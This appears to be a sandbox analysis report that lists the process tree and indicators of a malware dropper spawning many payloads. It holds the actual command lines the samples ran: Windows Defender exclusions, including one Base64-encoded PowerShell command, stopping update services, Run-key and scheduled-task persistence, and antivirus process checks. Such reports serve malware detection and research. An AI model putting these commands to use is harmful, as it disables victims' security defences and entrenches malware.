Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe
2832	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1408	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2832 wrote to memory of 2868	2832	chrome.exe	32
PID 2832 wrote to memory of 2868	2832	chrome.exe	32
PID 2832 wrote to memory of 2868	2832	chrome.exe	32
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2692	2832	chrome.exe	34
PID 2832 wrote to memory of 2720	2832	chrome.exe	35
PID 2832 wrote to memory of 2720	2832	chrome.exe	35
PID 2832 wrote to memory of 2720	2832	chrome.exe	35
PID 2832 wrote to memory of 2660	2832	chrome.exe	36
PID 2832 wrote to memory of 2660	2832	chrome.exe	36
PID 2832 wrote to memory of 2660	2832	chrome.exe	36
PID 2832 wrote to memory of 2660	2832	chrome.exe	36
PID 2832 wrote to memory of 2660	2832	chrome.exe	36
PID 2832 wrote to memory of 2660	2832	chrome.exe	36
PID 2832 wrote to memory of 2660	2832	chrome.exe	36
PID 2832 wrote to memory of 2660	2832	chrome.exe	36
PID 2832 wrote to memory of 2660	2832	chrome.exe	36
PID 2832 wrote to memory of 2660	2832	chrome.exe	36
PID 2832 wrote to memory of 2660	2832	chrome.exe	36
PID 2832 wrote to memory of 2660	2832	chrome.exe	36
PID 2832 wrote to memory of 2660	2832	chrome.exe	36
PID 2832 wrote to memory of 2660	2832	chrome.exe	36
PID 2832 wrote to memory of 2660	2832	chrome.exe	36
PID 2832 wrote to memory of 2660	2832	chrome.exe	36
PID 2832 wrote to memory of 2660	2832	chrome.exe	36
PID 2832 wrote to memory of 2660	2832	chrome.exe	36
PID 2832 wrote to memory of 2660	2832	chrome.exe	36

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3032
- C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2020
- C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2152
- - C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1536
- C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
  "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"
  2⤵
  PID:1744
- C:\Users\Admin\AppData\Local\Temp\Files\def.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\def.exe"
  2⤵
  PID:1844
- C:\Users\Admin\AppData\Local\Temp\Files\exclude.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\exclude.exe"
  2⤵
  PID:2736
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath C:\Users"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:584
- C:\Users\Admin\AppData\Local\Temp\Files\cudo.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cudo.exe"
  2⤵
  PID:1148
- C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe"
  2⤵
  PID:2820
- C:\Users\Admin\AppData\Local\Temp\Files\Discord3.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Discord3.exe"
  2⤵
  PID:2632
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit
    3⤵
    PID:2992
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2064
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp8C96.tmp.bat""
    3⤵
    PID:584
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:1532
  - - C:\Users\Admin\AppData\Roaming\Discord.exe
      "C:\Users\Admin\AppData\Roaming\Discord.exe"
      4⤵
      PID:2088
- C:\Users\Admin\AppData\Local\Temp\Files\octus.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\octus.exe"
  2⤵
  PID:320
- - C:\Users\Admin\AppData\Roaming\ff5c5ee747fc\feburary.exe
    "C:\Users\Admin\AppData\Roaming\ff5c5ee747fc\feburary.exe"
    3⤵
    PID:1540
  - - C:\Windows\SysWOW64\cmd.exe
      /c timeout 5 && del "C:\Users\Admin\AppData\Roaming\ff5c5ee747fc\feburary.exe" && exit
      4⤵
      PID:2088
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        5⤵
        Delays execution with timeout.exe
        
        PID:1788
- C:\Users\Admin\AppData\Local\Temp\Files\ConsoleApp3.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ConsoleApp3.exe"
  2⤵
  PID:972
- C:\Users\Admin\AppData\Local\Temp\Files\cabal.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cabal.exe"
  2⤵
  PID:1408
- - C:\Users\Admin\AppData\Local\Temp\Files\update.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\update.exe" mmoparadox
    3⤵
    PID:2732
- C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
  2⤵
  PID:1224
- - C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
    3⤵
    PID:1612
- C:\Users\Admin\AppData\Local\Temp\Files\Excel-http.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Excel-http.exe"
  2⤵
  PID:2924
- C:\Users\Admin\AppData\Local\Temp\Files\ubi-inst.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ubi-inst.exe"
  2⤵
  PID:2552
- - C:\Users\Admin\AppData\Local\Temp\is-UKFCO.tmp\ubi-inst.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-UKFCO.tmp\ubi-inst.tmp" /SL5="$102DC,922170,832512,C:\Users\Admin\AppData\Local\Temp\Files\ubi-inst.exe"
    3⤵
    PID:2668
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-2CEL4.tmp\set.bat""
      4⤵
      PID:688
- C:\Users\Admin\AppData\Local\Temp\Files\meta.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\meta.exe"
  2⤵
  PID:1920
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:2184
- C:\Users\Admin\AppData\Local\Temp\Files\DivineDialogue.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\DivineDialogue.exe"
  2⤵
  PID:1904
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c move Prerequisite Prerequisite.bat & Prerequisite.bat
    3⤵
    PID:2748
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:2356
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa opssvc"
      4⤵
      PID:2076
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:3028
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
      4⤵
      PID:2968
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 115839
      4⤵
      PID:2176
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V "ISTTRANSACTIONSCONFCOMMENTARY" Grew
      4⤵
      PID:1572
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b ..\Butter + ..\Community + ..\Efficiently + ..\Tyler + ..\Seas + ..\California + ..\Skip + ..\Publisher + ..\Disappointed + ..\We + ..\Ll + ..\Time + ..\Terrible + ..\Anal + ..\Fleece + ..\Always + ..\Tcp l
      4⤵
      PID:1340
  - - C:\Users\Admin\AppData\Local\Temp\115839\Leaving.pif
      Leaving.pif l
      4⤵
      PID:2992
    - - C:\Users\Admin\AppData\Local\Temp\115839\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\115839\RegAsm.exe
        5⤵
        
        PID:3912
    - - C:\Users\Admin\AppData\Local\Temp\115839\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\115839\RegAsm.exe
        5⤵
        
        PID:5808
    - - C:\Users\Admin\AppData\Local\Temp\115839\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\115839\RegAsm.exe
        5⤵
        
        PID:5820
  - - C:\Windows\SysWOW64\choice.exe
      choice /d y /t 5
      4⤵
      PID:2336
- C:\Users\Admin\AppData\Local\Temp\Files\installer.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\installer.exe"
  2⤵
  PID:772
- - C:\Windows\system32\reg.exe
    "reg" "query" "SYSTEM\CurrentControlSet\Services\Disk\Enum"
    3⤵
    PID:4648
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" "computersystem" "get" "manufacturer"
    3⤵
    PID:4668
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcQWRtaW5ccGtuYXBhZW5xcWp5ZGppdiI=')); Invoke-Expression $cmd"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5860
- C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe"
  2⤵
  PID:868
- - C:\Windows\sysnldcvmr.exe
    C:\Windows\sysnldcvmr.exe
    3⤵
    PID:2476
  - - C:\Users\Admin\AppData\Local\Temp\1034114071.exe
      C:\Users\Admin\AppData\Local\Temp\1034114071.exe
      4⤵
      PID:4880
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        5⤵
        
        PID:4976
      - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:5400
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        5⤵
        
        PID:5408
      - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:3884
  - - C:\Users\Admin\AppData\Local\Temp\136496212.exe
      C:\Users\Admin\AppData\Local\Temp\136496212.exe
      4⤵
      PID:5684
  - - C:\Users\Admin\AppData\Local\Temp\282129545.exe
      C:\Users\Admin\AppData\Local\Temp\282129545.exe
      4⤵
      PID:3972
- C:\Users\Admin\AppData\Local\Temp\Files\pi.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\pi.exe"
  2⤵
  PID:2716
- - C:\Windows\sysppvrdnvs.exe
    C:\Windows\sysppvrdnvs.exe
    3⤵
    PID:2252
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
      4⤵
      PID:3456
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3508
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
      4⤵
      PID:3464
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:3524
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:3560
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:3592
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        5⤵
        Launches sc.exe
        
        PID:3616
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        5⤵
        Launches sc.exe
        
        PID:3628
  - - C:\Users\Admin\AppData\Local\Temp\1883114730.exe
      C:\Users\Admin\AppData\Local\Temp\1883114730.exe
      4⤵
      PID:5128
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        5⤵
        
        PID:5372
      - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:5440
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        5⤵
        
        PID:5560
      - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:5664
  - - C:\Users\Admin\AppData\Local\Temp\3119411205.exe
      C:\Users\Admin\AppData\Local\Temp\3119411205.exe
      4⤵
      PID:5792
  - - C:\Users\Admin\AppData\Local\Temp\184854876.exe
      C:\Users\Admin\AppData\Local\Temp\184854876.exe
      4⤵
      PID:4628
- C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"
  2⤵
  PID:2172
- - C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"
    3⤵
    PID:6536
- C:\Users\Admin\AppData\Local\Temp\Files\channel.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\channel.exe"
  2⤵
  PID:5848
- C:\Users\Admin\AppData\Local\Temp\Files\RMS1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\RMS1.exe"
  2⤵
  PID:4216
- C:\Users\Admin\AppData\Local\Temp\Files\Bluescreen.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Bluescreen.exe"
  2⤵
  PID:6520
- C:\Users\Admin\AppData\Local\Temp\Files\xxl.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\xxl.exe"
  2⤵
  PID:6684
- C:\Users\Admin\AppData\Local\Temp\Files\1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\1.exe"
  2⤵
  PID:6728
- - C:\Users\Admin\sysklnorbcv.exe
    C:\Users\Admin\sysklnorbcv.exe
    3⤵
    PID:5676
- C:\Users\Admin\AppData\Local\Temp\Files\univ.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\univ.exe"
  2⤵
  PID:7104
- C:\Users\Admin\AppData\Local\Temp\Files\t1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\t1.exe"
  2⤵
  PID:6580
- - C:\Windows\sysklnorbcv.exe
    C:\Windows\sysklnorbcv.exe
    3⤵
    PID:5944
- C:\Users\Admin\AppData\Local\Temp\Files\Organiser.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Organiser.exe"
  2⤵
  PID:5292
- C:\Users\Admin\AppData\Local\Temp\Files\ovrflw.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ovrflw.exe"
  2⤵
  PID:11176
- - C:\Users\Admin\AppData\Roaming\Microsoft Network Agent\mswabnet.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft Network Agent\mswabnet.exe"
    3⤵
    PID:7404
- C:\Users\Admin\AppData\Local\Temp\Files\xt.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\xt.exe"
  2⤵
  PID:4484
- C:\Users\Admin\AppData\Local\Temp\Files\zcc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\zcc.exe"
  2⤵
  PID:9996
- - C:\Windows\system32\svchost.exe
    "C:\Windows\system32\svchost.exe"
    3⤵
    PID:7384
- - C:\Windows\system32\msiexec.exe
    "C:\Windows\system32\msiexec.exe"
    3⤵
    PID:4376
- - C:\Windows\system32\audiodg.exe
    "C:\Windows\system32\audiodg.exe"
    3⤵
    PID:8572
- C:\Users\Admin\AppData\Local\Temp\Files\Documents.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Documents.exe"
  2⤵
  PID:8072
- C:\Users\Admin\AppData\Local\Temp\Files\svc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\svc.exe"
  2⤵
  PID:8628
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\detailcompetitive.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\detailcompetitive.exe
    3⤵
    PID:4176
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:8652
- C:\Users\Admin\AppData\Local\Temp\Files\CnyvVl.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\CnyvVl.exe"
  2⤵
  PID:5140
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:8444
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 548
    3⤵
    - Program crash
    PID:1528
- C:\Users\Admin\AppData\Local\Temp\Files\freedom.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\freedom.exe"
  2⤵
  PID:6048
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\freedom.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'freedom.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2120
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7552
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4568
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows" /tr "C:\Users\Admin\Windows.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3144
- C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe"
  2⤵
  PID:7408
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FD72.tmp\FD73.tmp\FD74.bat C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe"
    3⤵
    PID:10436
  - - C:\Windows\system32\timeout.exe
      timeout 1
      4⤵
      Delays execution with timeout.exe
      PID:8120
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
      4⤵
      PID:7508
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
      4⤵
      PID:8184
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
      4⤵
      PID:8976
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
      4⤵
      PID:3584
  - - C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
      "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
      4⤵
      PID:8220
    - - C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        5⤵
        
        PID:9408
  - - C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
      "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
      4⤵
      PID:6628
    - - C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "WindowsDataUpdater" /sc ONLOGON /tr "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3020
  - - C:\Windows\system32\java.exe
      "C:\Windows\system32\java.exe"
      4⤵
      PID:7756
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\406A.tmp\406B.tmp\406C.bat C:\Windows\system32\java.exe"
        5⤵
        
        PID:3404
      - C:\Windows\system32\timeout.exe
        
        timeout 1
        6⤵
        Delays execution with timeout.exe
        
        PID:4980
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        6⤵
        
        PID:9872
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        6⤵
        
        PID:9636
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        6⤵
        
        PID:11152
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        6⤵
        
        PID:2408
      - C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        6⤵
        
        PID:1172
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        7⤵
        
        PID:10216
      - C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        6⤵
        
        PID:1400
      - C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        6⤵
        
        PID:560
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6B7F.tmp\6B80.tmp\6B81.bat C:\Windows\system32\java.exe"
        7⤵
        
        PID:7072
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        8⤵
        Delays execution with timeout.exe
        
        PID:9716
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        8⤵
        
        PID:4144
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        8⤵
        
        PID:9132
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        8⤵
        
        PID:4828
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        8⤵
        
        PID:7600
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        8⤵
        
